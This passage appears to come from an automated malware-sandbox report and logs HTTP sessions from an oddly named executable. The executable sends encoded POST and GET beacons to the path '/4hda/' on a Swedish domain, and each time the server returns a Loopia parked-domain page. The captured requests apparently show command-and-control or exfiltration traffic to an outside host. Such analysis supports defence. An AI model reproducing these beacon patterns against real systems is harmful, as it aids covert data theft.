                Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                Aug 19, 2024 04:28:03.640563011 CEST1236INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                Aug 19, 2024 04:28:03.640599012 CEST1236INData Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e
                Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                Aug 19, 2024 04:28:03.640630960 CEST1236INData Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e
                Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
                Aug 19, 2024 04:28:03.640666008 CEST878INData Raw: 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 73 69 74 65 62 75 69 6c 64 65 72 22 3e 43 72 65 61 74 65 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 77 69 74 68
                Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                14192.168.2.461888194.9.94.85804544C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                TimestampBytes transferredDirectionData
                Aug 19, 2024 04:28:05.499008894 CEST810OUTPOST /4hda/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.xn--matfrmn-jxa4m.se
                Origin: http://www.xn--matfrmn-jxa4m.se
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 219
                Referer: http://www.xn--matfrmn-jxa4m.se/4hda/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 6c 48 3d 7a 48 77 78 5a 76 34 50 2f 44 32 4d 38 6e 77 49 51 45 4d 32 41 6c 4a 45 54 35 35 53 31 35 30 6f 55 33 32 56 4d 77 37 62 6f 46 37 74 76 75 57 57 65 48 4d 6a 78 6b 4d 46 37 55 41 6c 75 6c 72 36 58 59 2f 34 57 53 79 56 51 4d 36 6d 44 79 55 74 6d 2b 44 43 78 4d 6e 55 30 68 4a 52 6f 7a 71 4b 35 33 51 76 42 74 44 32 32 64 2b 72 6e 7a 53 43 32 63 33 4b 62 50 65 37 75 41 6a 33 45 6a 56 46 57 5a 73 7a 53 55 34 57 45 71 33 4b 6b 6b 30 43 4c 59 50 6a 4f 5a 4f 74 58 69 36 6e 50 49 45 35 51 50 4b 4a 52 72 6f 2f 4e 74 6d 6c 48 73 73 4f 38 70 34 50 2f 67 4b 7a 32 51 53 67 78 46 46 4f 48 30 77 34 4f 52 4a 79 4d 44 38 49 34 71 37 44 79 2f 52 71 70 6e 34 3d
                Data Ascii: lH=zHwxZv4P/D2M8nwIQEM2AlJET55S150oU32VMw7boF7tvuWWeHMjxkMF7UAlulr6XY/4WSyVQM6mDyUtm+DCxMnU0hJRozqK53QvBtD22d+rnzSC2c3KbPe7uAj3EjVFWZszSU4WEq3Kkk0CLYPjOZOtXi6nPIE5QPKJRro/NtmlHssO8p4P/gKz2QSgxFFOH0w4ORJyMD8I4q7Dy/Rqpn4=
                Aug 19, 2024 04:28:06.168071985 CEST1236INHTTP/1.1 200 OK
                Server: nginx
                Date: Mon, 19 Aug 2024 02:28:06 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                X-Powered-By: PHP/8.1.29
                Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                Aug 19, 2024 04:28:06.168123007 CEST1236INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                Aug 19, 2024 04:28:06.168159008 CEST1236INData Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e
                Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                Aug 19, 2024 04:28:06.168190956 CEST1236INData Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e
                Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
                Aug 19, 2024 04:28:06.168229103 CEST878INData Raw: 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 73 69 74 65 62 75 69 6c 64 65 72 22 3e 43 72 65 61 74 65 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 77 69 74 68
                Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                15192.168.2.461889194.9.94.85804544C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                TimestampBytes transferredDirectionData
                Aug 19, 2024 04:28:08.027833939 CEST10892OUTPOST /4hda/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.xn--matfrmn-jxa4m.se
                Origin: http://www.xn--matfrmn-jxa4m.se
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 10299
                Referer: http://www.xn--matfrmn-jxa4m.se/4hda/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 6c 48 3d 7a 48 77 78 5a 76 34 50 2f 44 32 4d 38 6e 77 49 51 45 4d 32 41 6c 4a 45 54 35 35 53 31 35 30 6f 55 33 32 56 4d 77 37 62 6f 46 6a 74 76 62 43 57 66 6b 30 6a 77 6b 4d 46 67 55 42 69 75 6c 71 34 58 59 33 38 57 53 2b 76 51 4f 53 6d 43 58 41 74 6b 4c 33 43 6f 38 6e 55 32 68 4a 51 73 7a 72 65 35 33 41 72 42 74 7a 32 32 64 2b 72 6e 78 4b 43 67 2b 66 4b 55 76 66 4a 70 41 6a 7a 54 7a 55 69 57 5a 31 4c 53 55 38 73 45 61 58 4b 6b 41 51 43 59 4c 33 6a 4e 35 4f 76 51 69 37 69 50 49 4a 35 51 4f 6e 6c 52 75 55 56 4e 76 36 6c 57 39 73 52 6a 4e 49 4f 73 67 47 4b 31 52 32 52 39 32 56 54 66 30 78 45 44 7a 68 53 64 32 63 46 79 72 65 6f 72 38 4e 62 37 79 50 6d 65 6d 33 2f 67 39 6b 52 5a 36 38 36 4f 59 64 4e 42 77 5a 6d 79 6a 35 78 33 51 2b 79 77 30 51 6e 6d 66 64 70 46 41 75 46 70 58 42 32 45 51 31 78 62 59 72 31 66 59 2b 45 6b 45 46 66 33 51 54 58 69 70 4b 35 69 6b 2f 52 74 4a 49 66 58 53 2b 76 64 53 32 52 6b 75 64 67 6f 30 6c 6e 6a 6b 6c 67 7a 43 32 6e 32 49 4b 30 5a 32 46 62 6e 75 5a 49 6b 68 77 77 2f 6e 6b [TRUNCATED]
                Data Ascii: lH=zHwxZv4P/D2M8nwIQEM2AlJET55S150oU32VMw7boFjtvbCWfk0jwkMFgUBiulq4XY38WS+vQOSmCXAtkL3Co8nU2hJQszre53ArBtz22d+rnxKCg+fKUvfJpAjzTzUiWZ1LSU8sEaXKkAQCYL3jN5OvQi7iPIJ5QOnlRuUVNv6lW9sRjNIOsgGK1R2R92VTf0xEDzhSd2cFyreor8Nb7yPmem3/g9kRZ686OYdNBwZmyj5x3Q+yw0QnmfdpFAuFpXB2EQ1xbYr1fY+EkEFf3QTXipK5ik/RtJIfXS+vdS2Rkudgo0lnjklgzC2n2IK0Z2FbnuZIkhww/nkWim2hmqaT2OphONFeQMYrNBQ1VrkZqo5Fe+PIblPuXmZOwytYQ6Uzw2YGRa/rzQ+dYkLieKKzvIDTPNaHI4sLbLzerzUNaC0/MVLZT37ySpk5CXopLFmdJfVhRcwa4qnf3Z6XHe1RCxMgt+O2tzA/SU7bYvVWcJwysssdO9TPcuF+murPDQHN0WpQdiiJjNew1/U7+BqVoEXIhYW83o/ZXFh9UcKO3+MYz+199jGUI+2blszQQQqrHxvao5WCZNsaGcqOAYVbgQWlTOpTAtp5yMbe29opIqDFrLL0sQLelAjXBT2Cy7EQP2ELzdMPouQkwvUufwxyOTtHhqfqp9MFXVTJc7N0c2123UN7gN8ZctWHe1nIqZN6OTm6yw9UDiknTs8Edr/Zp69waFmdsZIKYSvqNY60QLu4zOXeD9eCtTRa/2DrQ9DBilsmrNaF5rf/0jUcFYokV5aQtfoAX1ROpqBSCH4d3SemCk3f/HHb77DqCufk35+CnN0K/7B4t8cTKAlFTUlFarlhLHYXKb/jWluD/IzP++JQL1qnziFXnhG1jiYS8pRwSEcmF/R4A5IMYKSCSwFXEjRN6uHopYIaXiopH1GgvaF0kx8a5D2ypsRvcFtUvBAAlv62+6uXWdW0eHXhBVRyuISs0NkBNwQ37x5v0LLr25XLW [TRUNCATED]
                Aug 19, 2024 04:28:08.800591946 CEST1236INHTTP/1.1 200 OK
                Server: nginx
                Date: Mon, 19 Aug 2024 02:28:08 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                X-Powered-By: PHP/8.1.29
                Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                Aug 19, 2024 04:28:08.800633907 CEST224INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.
                Aug 19, 2024 04:28:08.800712109 CEST1236INData Raw: 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 20 3d 20 31 2e 30 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65
                Data Ascii: 0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/responsive/styles/reset.css" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/shared/style/
                Aug 19, 2024 04:28:08.800749063 CEST1236INData Raw: 67 69 6e 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 67 69 6e 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61
                Data Ascii: gin to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=login">Loopia Customer zone</a> and actualize your plan.</p> <div class="divider"></div>
                Aug 19, 2024 04:28:08.800781965 CEST448INData Raw: 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62 6c 65 20 74 6f 20 6d 61 6e 61 67 65 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 69 6e 20 6f 6e 65 20 73 69 6e 67 6c 65 20 70 6c 61 63 65 20 69 6e 20 4c 6f 6f 70 69 61 20 43 75 73 74 6f 6d 65 72 20
                Data Ascii: S, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=dns">Read more at loopia.co
                Aug 19, 2024 04:28:08.800832987 CEST1236INData Raw: 65 74 20 73 74 61 72 74 65 64 20 77 69 74 68 20 79 6f 75 72 20 77 65 62 73 69 74 65 2c 20 65 6d 61 69 6c 2c 20 62 6c 6f 67 20 61 6e 64 20 6f 6e 6c 69 6e 65 20 73 74 6f 72 65 2e 3c 2f 70 3e 0a 09 09 09 3c 70 3e 0a 09 09 09 3c 75 6c 3e 0a 09 09 09
                Data Ascii: et started with your website, email, blog and online store.</p><p><ul><li><a href="https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=wordpress">Create your websi
                Aug 19, 2024 04:28:08.800863028 CEST206INData Raw: 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 73 75 70 70 6f 72 74 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70
                Data Ascii: loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb">Contact us</a></p></span></div>... /END #footer --></div>... /END .content --></body></html>0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                16192.168.2.461890194.9.94.85804544C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                TimestampBytes transferredDirectionData
                Aug 19, 2024 04:28:10.561928034 CEST513OUTGET /4hda/?lH=+FYRabRorC7iiipdZ2F3S2JpD5gx1+4XHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9+fjZ9jEj5Dze7n0KBNuQ8eKVrjet+eDbX/8=&Cj=Qhv8RTO8YPvh6L30 HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.xn--matfrmn-jxa4m.se
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Aug 19, 2024 04:28:11.205013037 CEST1236INHTTP/1.1 200 OK
                Server: nginx
                Date: Mon, 19 Aug 2024 02:28:11 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                X-Powered-By: PHP/8.1.29
                Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                Aug 19, 2024 04:28:11.205059052 CEST1236INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                Aug 19, 2024 04:28:11.205094099 CEST448INData Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e
                Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                Aug 19, 2024 04:28:11.205125093 CEST1236INData Raw: 73 73 3d 22 64 69 76 69 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 0a 09 09 09 3c 68 32 3e 52 65 67 69 73 74 65 72 20 64 6f 6d 61 69 6e 73 20 61 74 20 4c 6f 6f 70 69 61 3c 2f 68 32 3e 0a 09 09 09 3c 70 3e 50 72 6f 74 65 63 74 20 79 6f 75 72 20
                Data Ascii: ss="divider"></div><h2>Register domains at Loopia</h2><p>Protect your company name, brands and ideas as domains at one of the largest domain providers in Scandinavia. <a href="https://www.loopia.com/domainnames/?utm_medium=sitelink
                Aug 19, 2024 04:28:11.205159903 CEST1236INData Raw: 64 20 6d 6f 72 65 20 61 74 20 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 6f 70 69 61 64 6e 73 20 c2 bb 3c 2f 61 3e 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 69 76 69 64 65 72 22 3e 3c 2f 64 69 76 3e
